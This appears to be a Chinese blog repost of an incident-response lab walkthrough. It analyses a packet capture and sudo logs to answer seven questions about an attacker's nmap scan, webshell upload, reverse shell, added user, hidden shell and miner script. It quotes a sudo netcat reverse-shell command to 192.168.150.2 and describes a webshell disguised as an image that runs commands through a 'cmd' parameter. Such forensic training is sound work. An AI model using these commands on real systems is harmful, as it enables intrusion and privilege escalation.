当前位置: 首页 > news >正文

应急响应基础模拟靶机-security1

PS:杰克创建在流量包(result.pcap)在根目录下,请根据已有信息进行分析

1、攻击者使用的端口扫描工具是?

2、通过流量及日志审计,攻击者上传shell的时访问web使用IP地址是多少?

3、审计流量日志,攻击者反弹shell的地址及端口?

4、攻击者使用的提权方式及工具是什么?

5、攻击者创建的新用户名是?

6、攻击者将shell删除并放到了其他web目录,文件名被改变了,找出它的绝对路径及文件名

7、攻击者使用新用户留下了木马进行不法行为,找出程序名,给出程序的绝对路径


用户名及密码:security/P@ssw0rd,将/result.pcap文件下载下来:


1、攻击者使用的端口扫描工具是?

过滤出http协议,看到User-Agent值出现了nmap关键词:

答案:nmap


2、通过流量及日志审计,攻击者上传shell的时访问web使用IP地址是多少?

Ctrl F搜索关键词“upload”,看到上传了admin.jpg并用“cmd”传参来执行system()函数执行命令which nc:

答案:192.168.150.1


3、审计流量日志,攻击者反弹shell的地址及端口?

继续Ctrl F搜索关键词“admin.jpg”,不断查找,发现反弹shell信息:

答案:192.168.150.2:4444


4、攻击者使用的提权方式及工具是什么?

执行命令journalctl _COMM=sudo > sudo.txt,使用systemd的系统查看sudo命令的历史,保存为sudo.txt文件:

打开搜索关键词“192.168.150.2”发现都有8888端口和nc命令:

答案:sudo nc -e /bin/bash 192.168.150.2 8888


5、攻击者创建的新用户名是?

打开虚拟机就能发现有别的用户“securityy”:

也可以通过命令“cat /etc/passwd”列出系统上的所有用户账号:

一样能看出有个securityy用户

答案:securityy


6、攻击者将shell删除并放到了其他web目录,文件名被改变了,找出它的绝对路径及文件名

继续在sudo.txt中查找关键词“mv”,发现securityy用户在/var/www/blog目录下创建了.ShEllHAha目录,并且将原本的shell从../html/uploads/admin.jpg移动到./.ShEllHAha/.hackba.php

答案:/var/www/blog/.ShEllHAha/.hackba.php


7、攻击者使用新用户留下了木马进行不法行为,找出程序名,给出程序的绝对路径

在第六问中,往下看刚好能看到有个Wakuang.sh(谐音挖矿)关键词,发现securityy用户在/opt目录下创建了.Qwert目录并创建了.Wakuang.sh文件:

答案:/opt/.Qwert/.Wakuang.sh

相关文章:

  • 电位器如何接入西门子PLC的模拟量输入
  • 【技巧】如何把win10 wsl的安装目录从c盘迁移到d盘
  • 弹窗表单的使用,基于element-ui二次封装
  • C++面向对象特性之多态篇
  • 实现线程的4种方法
  • Linux 系统安装Minio详细教程
  • 第04章—技术突击篇:如何根据求职意向进行快速提升与复盘
  • Windows Server 2025开启GPU分区(GPU-P)部署DoraCloud云桌面
  • LINUX CFS算法解析
  • C语言实现三子棋
  • 数字化转型:概念性名词浅谈(第二十六讲)
  • vue 监听元素大小变化 element-resize-detector
  • ndarray数组掩码操作,True和False获取数据
  • 数字化转型-4A架构之数据架构
  • 《被讨厌的勇气》书摘
  • Papyrus字体介绍
  • CDGP|数据治理怎么带动企业高速发展?
  • 全国青少年信息素养大赛 Python编程挑战赛初赛 内部集训模拟试卷五及详细答案解析
  • 【PhysUnits】3.2 SI 量纲 补充幂运算(dimension/mod.rs)
  • 操作系统面试问题(4)
  • 湖北宜昌:在青山绿水间解锁乡村振兴“密码”
  • 上海消防全面推行“检查码”,会同相关部门推行“综合查一次”
  • 新村回响:一周城市生活
  • 越怕出错越会出错,“墨菲定律”的魔咒该怎么破?
  • 明天起,沪苏湖高铁、杭温高铁推出13款新型票制产品
  • 中国证监会印发《推动公募基金高质量发展行动方案》